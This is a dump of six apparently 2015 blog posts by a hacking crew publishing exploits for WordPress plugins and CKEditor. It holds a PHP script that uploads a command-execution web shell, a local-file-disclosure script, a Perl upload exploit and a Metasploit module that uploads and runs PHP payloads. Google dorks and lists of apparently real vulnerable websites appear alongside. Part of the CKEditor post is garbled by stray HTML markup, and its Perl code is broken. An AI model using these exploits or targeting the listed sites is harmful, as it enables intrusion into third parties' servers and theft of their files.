tag:blogger.com,1999:blog-14702990296772696342024-03-13T13:59:16.486-07:00K3dxGHSecurityKernel of the Penetration Testing & IT SecurityAnonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.comBlogger6125tag:blogger.com,1999:blog-1470299029677269634.post-25069522942494897252015-03-23T04:19:00.002-07:002015-03-23T04:19:18.994-07:00WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability<?php<br />
###########################################<br />
# >> D_x . Made In Algeria . x_Z << #<br />
###########################################<br />
#<br />
# [>] Title : WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability<br />
#<br />
# [>] Author : KedAns-Dz<br />
# [+] E-mail : ked-h (@hotmail.com)<br />
# [+] FaCeb0ok : fb.me/K3d.Dz<br />
# [+] TwiTter : @kedans<br />
#<br />
# [#] Platform : PHP / WebApp<br />
# [+] Cat/Tag : File Upload / Code Exec<br />
#<br />
# [<] <3 <3 Greetings t0 Palestine <3 <3<br />
# [!] Vendor : http://www.inboundio.com<br />
#<br />
###########################################<br />
#<br />
# [!] Description :<br />
#<br />
# Wordpress plugin InBoundio Marketing v1.0 is suffer from File/Shell Upload Vulnerability<br />
# remote attacker can upload file/shell/backdoor and exec commands.<br />
#<br />
####<br />
# Lines (6... to 20) : csv_uploader.php<br />
####<br />
#<br />
# ExpLO!T :<br />
# -------<br />
<br />
$postData = array();<br />
$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)<br />
<br />
$dz = curl_init();<br />
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");<br />
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");<br />
curl_setopt($dz, CURLOPT_POST, 1);<br />
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );<br />
curl_setopt($dz, CURLOPT_TIMEOUT, 0);<br />
$buf = curl_exec ($dz);<br />
curl_close($dz);<br />
unset($dz);<br />
echo $buf;<br />
<br />
/*<br />
[!] creat your shell file =><br />
_ k3dz.php :<br />
<br />
<?php system($_GET['dz']); ?><br />
<br />
[>] Post the exploit<br />
[+] Find you'r backdoor : ../inboundio-marketing/admin/partials/uploaded_csv/k3dz.php?dz=[ CMD ]<br />
[+] Or upload what you whant ^_^ ...<br />
<br />
*/<br />
<br />
####<br />
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br />
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />
#---------------------------------------------------------------<br />
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,<br />
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br />
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br />
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br />
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br />
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &<br />
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;<br />
####<br />
?><br />
<div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0tag:blogger.com,1999:blog-1470299029677269634.post-67641329115864272652015-03-23T04:17:00.002-07:002015-03-23T04:17:25.064-07:00WordPress plugin (PageBuilderSandwich v0.7.1) Full Path Disclosure###########################################<br />
# >> D_x . Made In Algeria . x_Z << #<br />
###########################################<br />
#<br />
# [>] Title : WordPress plugin (PageBuilderSandwich v0.7.1) Full Path Disclosure<br />
#<br />
# [>] Author : KedAns-Dz<br />
# [+] E-mail : ked-h (@hotmail.com)<br />
# [+] FaCeb0ok : fb.me/K3d.Dz<br />
# [+] TwiTter : @kedans<br />
#<br />
# [#] Platform : PHP / WebApp<br />
# [+] Cat/Tag : Path Disclosure<br />
#<br />
# [<] <3 <3 Greetings t0 Palestine <3 <3<br />
# [!] Vendor : https://github.com/gambitph/Page-Builder-Sandwich<br />
#<br />
###########################################<br />
#<br />
# [!] Description :<br />
#<br />
# Wordpress plugin page-builder-sandwich v0.7.1 is suffer from full path disclosure,<br />
# remote attacker can disclosure the full path of the script into the server.<br />
#<br />
# CWE-200<br />
#<br />
####<br />
#<br />
# http://[Target]/wp-content/plugins/page-builder-sandwich/inc/shortcake/shortcode-ui.php<br />
# http://[Target]/wp-content/plugins/page-builder-sandwich/inc/simple_html_dom.php<br />
# http://[Target]/wp-content/plugins/page-builder-sandwich/lib/shortcode/ *.php<br />
#<br />
####<br />
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br />
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />
#---------------------------------------------------------------<br />
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,<br />
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br />
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br />
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br />
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br />
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &<br />
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;<br />
####Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0tag:blogger.com,1999:blog-1470299029677269634.post-37454894326192039922015-03-23T04:13:00.002-07:002015-03-23T04:13:39.624-07:00WordPress plugin (mp3-jplayer v2.3) Local File Disclosure<?php<br />
###########################################<br />
# >> D_x . Made In Algeria . x_Z << #<br />
###########################################<br />
#<br />
# [>] Title : WordPress plugin (mp3-jplayer v2.3) Local File Disclosure<br />
#<br />
# [>] Author : KedAns-Dz<br />
# [+] E-mail : ked-h (@hotmail.com)<br />
# [+] FaCeb0ok : fb.me/K3d.Dz<br />
# [+] TwiTter : @kedans<br />
#<br />
# [#] Platform : PHP / WebApp<br />
# [+] Cat/Tag : File Disclosure<br />
#<br />
# [<] <3 <3 Greetings t0 Palestine <3 <3<br />
# [!] Vendor : http://mp3-jplayer.com<br />
#<br />
###########################################<br />
#<br />
# [!] Description :<br />
#<br />
# Wordpress plugin mp3-jplayer v2.3 is suffer from local file disclosure,<br />
# remote attacker can Download/Disclosure file's from the root-path.<br />
#<br />
# ExpLO!T :<br />
# -------<br />
#<br />
$dz = curl_init();<br />
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/mp3-jplayer/download.php?mp3=[ LFI ].mp3"); # or ../remote/downloader.php?mp3=[ LFI ].ogg<br />
curl_setopt($dz, CURLOPT_HTTPGET, 1);<br />
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");<br />
curl_setopt($dz, CURLOPT_TIMEOUT, 0);<br />
$buf = curl_exec ($dz);<br />
curl_close($dz);<br />
unset($dz);<br />
echo $buf;<br />
<br />
####<br />
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br />
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />
#---------------------------------------------------------------<br />
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,<br />
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br />
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br />
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br />
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br />
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &<br />
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;<br />
####<br />
?>Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0tag:blogger.com,1999:blog-1470299029677269634.post-3746988401207904392015-03-20T14:13:00.001-07:002015-03-20T14:13:14.137-07:00Wordpress Plugin (wp-super-cache) Absolute Path Traversal~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /> -----------------------------------------<br /> [Copyright (c) 2015 | Dz Offenders Cr3w ]<br /> -----------------------------------------<br /><br />###########################################<br /># >> D_x . Made In Algeria . x_Z << #<br />###########################################<br />#<br /># [>] Title : Wordpress Plugin (wp-super-cache) Absolute Path Traversal<br />#<br /># [>] Author : KedAns-Dz<br /># [+] E-mail : ked-h (@hotmail.com)<br /># [+] FaCeb0ok : fb.me/K3d.Dz<br /># [+] TwiTter : @kedans<br />#<br /># [#] Platform : PHP / WebApp<br /># [+] Cat/Tag : Directury & Path Traversal<br />#<br /># [<] <3 <3 Greetings t0 Palestine <3 <3<br />#<br /># [!] Vendor : wordpress.org<br /># [D] Download : https://wordpress.org/plugins/wp-super-cache/<br /># [V] Version : x.ALL -> latest 1.4.2<br />#<br />#######################################################################<br />#<br /># [!] Description :<br /># -----------------<br /># <br /># - Wordpress Plugin (wp-super-cache) is suffer from Absolute Path Traversal<br /># his allows attackers to traverse the file system to access files or directories <br /># that are outside of the restricted directory. <br />#<br /># [*] CWE-36<br />#<br />#####<br />#<br /># [!] Google Dork : <br /># -----------------<br />#<br /># - inurl:/wp-content/plugins/wp-super-cache/<br />#<br />#####<br />#<br /># [>] Demos :<br /># -----------<br />#<br /># http://gossipextra.com/wp-content/cache/supercache/<br /># http://popathon.org/learningtocount/wp-content/cache/supercache/<br /># http://college-deparcieux.fr/radio/wp-content/cache/supercache/<br /># http://nutritionwonderland.com/wp-content/plugins/wp-super-cache/<br /># http://www.houstonkraft.com/wp-content/plugins/wp-super-cache/<br /># Mo in gooGlE *_^ ....<br />#<br />#####<br />#<br /># [F] Bug Fix :<br /># -------------<br />#<br /># - Just put index.html & .htaccess into the Plugin Path :D ;)<br /># very easy : No ThanX by the way ^__^<br />#<br />####<br /># <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br /># Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />#---------------------------------------------------------------<br /># Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , <br /># Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br /># & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br /># & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br /># & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br /># & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & <br /># =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=<br />####Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0tag:blogger.com,1999:blog-1470299029677269634.post-42933049871361474872015-03-20T14:10:00.001-07:002015-03-20T14:10:17.383-07:00Wordpress Plugins (error_log) Full Path Disclosure###########################################<br />#-----------------------------------------<br />#[Copyright (c) 2015 | Dz Offenders Cr3w ]<br />
#-----------------------------------------<br />###########################################<br /># >> D_x . Made In Algeria . x_Z << #<br />###########################################<br />#<br /># [>] Title : Wordpress Plugins (error_log) Full Path Disclosure<br />#<br /># [>] Author : KedAns-Dz<br /># [+] E-mail : ked-h (@hotmail.com)<br /># [+] FaCeb0ok : fb.me/K3d.Dz<br /># [+] TwiTter : @kedans<br />#<br /># [#] Platform : PHP / WebApp<br /># [+] Cat/Tag : Full Path Disclosure<br />#<br /># [<] <3 <3 Greetings t0 Palestine <3 <3<br />#<br /># [!] Vendor : wordpress.org<br /># [D] Download : ** Multiple Plugins **<br /># [V] Version : Wordpress x.ALL->latest (with vulnerable plugin installed)<br />#<br />#######################################################################<br />#<br /># [!] Description :<br /># -----------------<br /># <br /># - Wordpress Plugins (Multiple Plugins) is suffer from Full Path Disclosure<br /># allows remote attackers to disclosure the error_log revealing the full path script.<br /># <br /># > Moore Info see :<br /># [*] CWE-200<br />#<br />#####<br />#<br /># [!] Google Dork : <br /># -----------------<br />#<br /># - inurl:/wp-content/plugins/(*)/error_log<br />#<br />#####<br />#<br /># [>] Demos :<br /># -----------<br />#<br /># http://www.lifeintheoffice.com/wp-content/plugins/wordspew/error_log<br /># http://unitedfreeworld.com/wp-content/plugins/download-monitor/error_log<br /># http://threads13.com/wp-content/plugins/astickypostorderer/error_log<br /># http://www.ancira.us/jake/wp-content/plugins/astickypostorderer/error_log<br /># http://culturalcenter.gov.ph/wp-content/plugins/icg-ticketing-system/view/yespayments/error_log<br /># http://www.yootheniks.com/wp/wp-content/plugins/zingiri-tickets/extensions/error_log<br /># http://www.londonru.com/realestate/wp-content/plugins/firestorm-real-estate-plugin/error_log<br /># http://www.duomcgaw.com/lemonbarrettsreview/wp-content/plugins/re/error_log<br /># http://wazefte.com/portal/wp-content/plugins/fbc/inc/api/error_log<br /># http://www.vadimkolpakov.com/wp-content/plugins/limit-login-attempts/error_log<br /># http://bendsensigns.com/wp-content/plugins/peters-login-redirect/error_log<br /># http://www.rak-rijeka.org/wp-content/plugins/sidebar-login/error_log<br /># http://www.mercysong.com/wp-content/plugins/limit-login-attempts/error_log<br /># http://thebills.ca/wp-content/plugins/wp-mailinglist/views/email/error_log<br /># http://www.vadimkolpakov.com/wp-content/plugins/limit-login-attempts/error_log<br />#<br /># Mo in gooGlE *_^ ....<br />#<br />#####<br />#<br /># [F] Bug Fix :<br /># -------------<br />#<br /># - protect (error_log) with .htaccess and put it into the Plugin Path :D ;)<br /># very easy : No ThanX by the way ^__^<br />#<br />####<br /># <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br /># Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />#---------------------------------------------------------------<br /># Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , <br /># Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br /># & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br /># & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br /># & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br /># & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & <br /># =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=<br />####Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0tag:blogger.com,1999:blog-1470299029677269634.post-87808756592667855212015-03-20T14:06:00.001-07:002015-03-20T14:06:35.636-07:00Ckeditor v4.4.7.xx Multiple Vulnerabilities<intro -="" 03-2015="" 1337day="" 4.4.x="" all="" and="" arbitrary="" arget="" by="" chomp="" ckeditor="" coded="" contact:="" copyright="" cr3w="" dz="" exploit="" file="" greetings:="" homies="" host="" hotmail.com="" intro="" ked-h="" kedans-dz="" my="" offenders="" path:="" print="" tar="<STDIN" upload=""><stdin><ked-h at="" day.com="">#################################</ked-h></stdin></intro><br />
<intro -="" 03-2015="" 1337day="" 4.4.x="" all="" and="" arbitrary="" arget="" by="" chomp="" ckeditor="" coded="" contact:="" copyright="" cr3w="" dz="" exploit="" file="" greetings:="" homies="" host="" hotmail.com="" intro="" ked-h="" kedans-dz="" my="" offenders="" path:="" print="" tar="<STDIN" upload=""><stdin><ked-h at="" day.com="">#-----------------------------------------<br />#[Copyright (c) 2015 | Dz Offenders Cr3w]<br />#-----------------------------------------<br />################################</ked-h></stdin></intro><br />
<intro -="" 03-2015="" 1337day="" 4.4.x="" all="" and="" arbitrary="" arget="" by="" chomp="" ckeditor="" coded="" contact:="" copyright="" cr3w="" dz="" exploit="" file="" greetings:="" homies="" host="" hotmail.com="" intro="" ked-h="" kedans-dz="" my="" offenders="" path:="" print="" tar="<STDIN" upload=""><stdin><ked-h at="" day.com=""># >> D_x . Made In Algeria . x_Z << #<br />################################</ked-h></stdin></intro><br />
<intro -="" 03-2015="" 1337day="" 4.4.x="" all="" and="" arbitrary="" arget="" by="" chomp="" ckeditor="" coded="" contact:="" copyright="" cr3w="" dz="" exploit="" file="" greetings:="" homies="" host="" hotmail.com="" intro="" ked-h="" kedans-dz="" my="" offenders="" path:="" print="" tar="<STDIN" upload=""><stdin><ked-h at="" day.com="">#<br /># [>] Title : Ckeditor v4.4.7.xx Multiple Vulnerabilities<br />#<br /># [>] Author : KedAns-Dz<br /># [+] E-mail : ked-h (@hotmail.com)<br /># [+] FaCeb0ok : fb.me/K3d.Dz<br /># [+] TwiTter : @kedans<br />#<br /># [#] Platform : PHP / WebApp<br /># [+] Cat/Tag : File Upload , XSRF-HTML Injection<br />#<br /># [<] <3 <3 Greetings t0 Palestine <3 <3<br /># [>] ^_^ Greetings to 1337day Users/FAN's <3<br /># [-] F-ck Hacking , LuV Exploiting<br /># [!] Vendor : http://ckeditor.com/<br /># [D] Download : <br /># - http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.4.7/ckeditor_4.4.7_full.zip<br />#<br />#######################################################################<br />#<br /># [!] Description :<br />#<br /># FCKeditor version 4.4.7 is suffer from XSS/HTML Injection and <br /># Other multiple vulnerabilities like File Upload (more ex: see-> <br /># [ http://1337day.com/search?search_request=ckeditor ]<br /># remote attacker can use some CKE files to upload remote file or <br /># Injecting XSS/HTML Codes.<br />#<br />#<br />#####<br />#<br /># [!] Google Dorks : <br /># ------------------<br /># 1- allinurl:"/ckeditor/samples/plugins/htmlwriter"<br /># 2- allinurl:"/ckeditor/samples/plugins/htmlwriter/outputhtml.html"<br /># 3- allinurl:"/FCKeditor/_samples/php/sample01.php"<br /># 4- allinurl:"/FCKeditor/editor/filemanager/browser/default/browser.html"<br /># 5- allinurl:"/FCKeditor/editor/filemanager"<br />#<br />#####<br />#<br /># [+] Exploit (1) ' XSS/XSRF/HTML Injection ' :=><br /># -----------------------------------------------<br />#<br /># - the vuln in htmlwriter plugin :<br />#<br /># > http://[target]/[path]/ckeditor/samples/plugins/htmlwriter/outputhtml.html<br />#<br /># > Edit & Submit you'r Code just it !<br />#<br />#####<br />#<br /># [+] Exploit (2) ' File Upload ' :=><br /># -----------------------------------<br /># REF : http://1337day.com/search?search_request=ckeditor<br />#<br /># +> Use this PERL Script :=><br /># ***********<br /># #!/usr/bin/perl<br />#<br /># use strict;<br /># use LWP::UserAgent;<br /># use HTTP::Request::Common;<br /># <br /># print <<INTRO;<br /># - CKEditor 4.4.x Arbitrary File Upload Exploit<br /># - Coded By KedAns-Dz<br /># - Contact: ked-h@hotmail.com<br /># - Greetings: 1337day , Dz Offenders , All my Homies<br /># - Copyright (C) 03-2015 - Dz Offenders Cr3w<br /># INTRO<br /># print "Target host and Path: ";<br /># chomp (my $tar=<STDIN>);<br /># print "Directory / File / Shell: ";<br /># chomp (my $shell=<STDIN>);<br /># <br /># my $a = LWP::UserAgent->new;<br /># my $b = $a->request(POST $tar.'/fckeditor/editor/filemanager/browser/upload/php/upload.php';<br /># Content_Type => 'form-data',<br /># Content => [ NewFile => $shell ] );<br /># <br /># if ($b->is_success) {<br /># if (index($b->content, "Disabled") != -1) { print "The webserver is manipulated with your shellcode.\n"; } <br /># else { print "Exploit failed! :(\n";<br /># } else { print "Not connected with Target!\n"; }<br />#<br />##########<br /># *********<br /># Or wit' that MSF Exploit :=><br />#<br />#<br /># require 'msf/core'<br /># <br /># class Metasploit3 < Msf::Exploit::Remote<br /># Rank = ExcellentRanking<br /># <br /># include Msf::Exploit::Remote::HttpClient<br /># <br /># def initialize(info = {})<br /># super(update_info(info,<br /># 'Name' => 'FCKeditor 4.4.x File Upload Code Execution',<br /># 'Description' => %q{<br /># This module exploits a vulnerability in the FCK/CKeditor plugin.<br /># By renaming the uploaded file this vulnerability can be used to upload/execute<br /># code on the affected system.<br /># },<br /># 'Author' => [ 'KedAns-Dz <ked-h[at]1337day.com>' ],<br /># 'License' => MSF_LICENSE,<br /># 'Version' => '1.0',<br /># 'References' =><br /># [<br /># ['URL', 'http://1337day.com/search?search_request=ckeditor'],<br /># ],<br /># 'Privileged' => false,<br /># 'Payload' =><br /># {<br /># 'DisableNops' => true,<br /># 'Compat' =><br /># {<br /># 'ConnectionType' => 'find',<br /># },<br /># 'Space' => 1024,<br /># },<br /># 'Platform' => 'php',<br /># 'Arch' => ARCH_PHP,<br /># 'Targets' => [[ 'Automatic', { }]],<br /># 'DisclosureDate' => '02/05/2011',<br /># 'DefaultTarget' => 0))<br /># <br /># register_options(<br /># [<br /># OptString.new('URI', [true, "CKE Target directory path", "/"]),<br /># ], self.class)<br /># end<br /># <br /># def check<br /># uri = ''<br /># uri << datastore['URI']<br /># uri << '/' if uri[-1,1] != '/'<br /># uri << 'fckeditor/editor/filemanager/connectors/php/upload.php?Type=File'<br /># res = send_request_raw(<br /># {<br /># 'uri' => uri<br /># }, 25)<br /># <br /># if (res and res.body =~ /sample16.swf/)<br /># return Exploit::CheckCode::Vulnerable<br /># end<br /># <br /># return Exploit::CheckCode::Safe<br /># end<br /># <br /># <br /># def retrieve_obfuscation()<br /># <br /># end<br /># <br /># <br /># def exploit<br /># <br /># cmd_php = '<?php ' + payload.encoded + '?>'<br /># <br /># # Generate some random strings<br /># cmdscript = rand_text_alpha_lower(20)<br /># boundary = rand_text_alphanumeric(6)<br /># <br /># # Static files<br /># directory = '/fckeditor/editor/images'<br /># uri_base = ''<br /># uri_base << datastore['URI']<br /># uri_base << '/' if uri_base[-1,1] != '/'<br /># uri_base << 'fckeditor/editor/filemanager/connectors/php'<br /># <br /># # Get obfuscation code (needed to upload files)<br /># obfuscation_code = nil<br /># <br /># res = send_request_raw({<br /># 'uri' => uri_base + '/upload.php?Type=File'<br /># }, 25)<br /># <br /># if (res)<br /># <br /># if(res.body =~ /"obfus", "((\w)+)"\)/)<br /># obfuscation_code = $1<br /># print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")<br /># else<br /># print_error("Error retrieving obfuscation code!")<br /># return<br /># end<br /># end<br /># <br /># # Upload shellcode (file ending .ph.p)<br /># data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"<br /># data << "#{cmdscript}.ph.p\r\n--#{boundary}"<br /># data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"<br /># data << "Content-Type: application/octet-stream\r\n\r\n"<br /># data << cmd_php<br /># data << "\r\n--#{boundary}--"<br /># <br /># res = send_request_raw({<br /># 'uri' => uri_base + "/connector.php?Command=FileUpload&Type=File&CurrentFolder=" + directory + "&obfuscate=#{obfuscation_code}",<br /># 'method' => 'POST',<br /># 'data' => data,<br /># 'headers' =><br /># {<br /># 'Content-Length' => data.length,<br /># 'Content-Type' => 'multipart/form-data; boundary=' + boundary,<br /># }<br /># }, 25)<br /># <br /># if (res and res.body =~ /File Upload Success/)<br /># print_status("Successfully uploaded #{cmdscript}.ph.p")<br /># else<br /># print_error("Error uploading #{cmdscript}.ph.p")<br /># end<br />#<br /># # Complete the upload process (rename file)<br /># print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")<br /># res = send_request_raw({<br /># 'uri' => uri_base + '/connector.php?Command=FileUpload&Type=File&CurrentFolder=' + directory + '&filetotal=1'<br /># })<br /># <br /># # Rename the file from .ph.p to .php<br /># res = send_request_cgi(<br /># {<br /># 'method' => 'POST',<br /># 'uri' => uri_base + '/connector.php?Command=Edit&Type=File&CurrentFolder=',<br /># 'vars_post' =><br /># {<br /># 'actionfile[0]' => "#{cmdscript}.ph.p",<br /># 'renameext[0]' => 'p',<br /># 'renamefile[0]' => "#{cmdscript}.ph",<br /># 'sortby' => 'name',<br /># 'sorttype' => 'asc',<br /># 'showpage' => '0',<br /># 'action' => 'rename',<br /># 'commit' => '',<br /># }<br /># }, 10)<br /># <br /># if (res and res.body =~ /successfully renamed./)<br /># print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")<br /># else<br /># print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")<br /># end<br /># <br /># <br /># # Finally call the payload<br /># print_status("Calling payload: #{cmdscript}.php")<br /># uri = ''<br /># uri << datastore['URI']<br /># uri << '/' if uri[-1,1] != '/'<br /># uri << directory + cmdscript + ".php"<br /># res = send_request_raw({<br /># 'uri' => uri<br /># }, 25)<br /># <br /># end<br /># <br /># end<br />#<br />#<br />#<br />###########<br />#<br /># Demo's :=><br /># http://common.beyondindigopets.com/ckeditor/samples/plugins/htmlwriter/outputhtml.html<br /># http://heather.cs.ucdavis.edu/ckeditor/samples/plugins/htmlwriter/outputhtml.html<br /># http://dol-de-bretagne.fr/scripts/FCKeditor/_samples/php/sample01.php<br /># http://tutor.talkbean.com/front/com/FCKeditor/editor/filemanager/browser/default/browser.html<br /># http://www.aseat.fr/fckeditor/editor/filemanager/browser/default/browser.html<br /># Mo in g00glE ;)<br />#######################################################################<br />#<br /># REF :<br /># > http://packetstormsecurity.com/files/130807/Ckeditor-4.4.7-Shell-Upload-Cross-Site-Scripting.html<br /># > https://cxsecurity.com/issue/WLB-2015030092<br /># > OSVDB : http://osvdb.org/show/osvdb/119607<br /># <br />####<br /># <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br /># Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />#---------------------------------------------------------------<br /># Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , <br /># Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br /># & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br /># & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br /># & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br /># & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & <br /># =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=<br />####<br /><!--3--></ked-h></stdin></intro><!--3--><!--3-->Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0